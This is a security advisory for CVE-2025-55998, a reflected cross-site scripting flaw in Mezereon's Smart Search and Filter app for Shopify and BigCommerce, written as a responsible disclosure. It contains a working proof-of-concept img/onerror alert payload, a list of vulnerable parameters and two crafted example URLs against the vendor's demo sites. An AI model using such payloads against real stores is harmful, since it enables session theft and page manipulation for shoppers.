# CVE-2025-55998

## Summary

| Vulnerability Details | CVE-2025-55998                                                                      |
|-----------------------|-------------------------------------------------------------------------------------|
| **Type**              | XSS                                                                                 |
| **Title**             | Reflected XSS in Mezereon's Smart Search and Filter app for Shopify and BigCommerce |
| **Product impacted**  | Smart Search and Filter app                                                         |
| **Impacted version**  | 1.0 (not fixed)                                                                     |
| **CVSS Score**        | TBD                                                                                 |
| **Author**            | Ocmenog                                                                             |

## Description

A lack of parameter value sanitization allows remote attackers to perform a reflected Cross-Site Scripting (XSS) attack in the Smart Search and Filter app for Shopify and BigCommerce.
The parameters value can be modified directly in the URL to insert a payload.

## Impact

The malicious payload executes in the context of the vulnerable application, allowing an attacker to perform actions on behalf of the victim, steal sensitive information (such as session cookies or user data), or manipulate the content of the page. The impact affects confidentiality and integrity. 
User interaction (e.g., clicking a crafted link) is required to trigger the vulnerability.

## Proof of concept

A payload such as `<img src=x onerror='alert("XSS")'/>` could be used in the following parameters to trigger an XSS:
- mz.category
- mz.price
- mz.option_color
- mz.color
- mz.size
- mz.tree
- mz.percent_sale
- mz.shoe_size
- mz.reviews
- mz.show
- mz.brand
- mz.custom_year
- ...

Examples:
```
https://shopify.mezereon.com/collections/symmetry-filters?page=1&sort=_score&size=24&mz.option_color=Purple<img%20src=x%20onerror=%27alert("XSS")%27/>
https://mezereon.mybigcommerce.com/shop-all/?page=1&sort=_score&size=12&mz.color=Purple%3Cimg%20src=x%20onerror=%27alert(%22XSS%22)%27/%3E
```

## Timeline

- 23/06/2025 : Vulnerability discovered
- 23/06/2025 : Vendor contacted
- 03/09/2025 : CVE ID attributed


## References

- [Mezereon's website](https://www.mezereon.com/)
- [Mezereon's shopify demo website](https://shopify.mezereon.com/)
- [Mezereon's bigcommerce demo website](https://mezereon.mybigcommerce.com/)
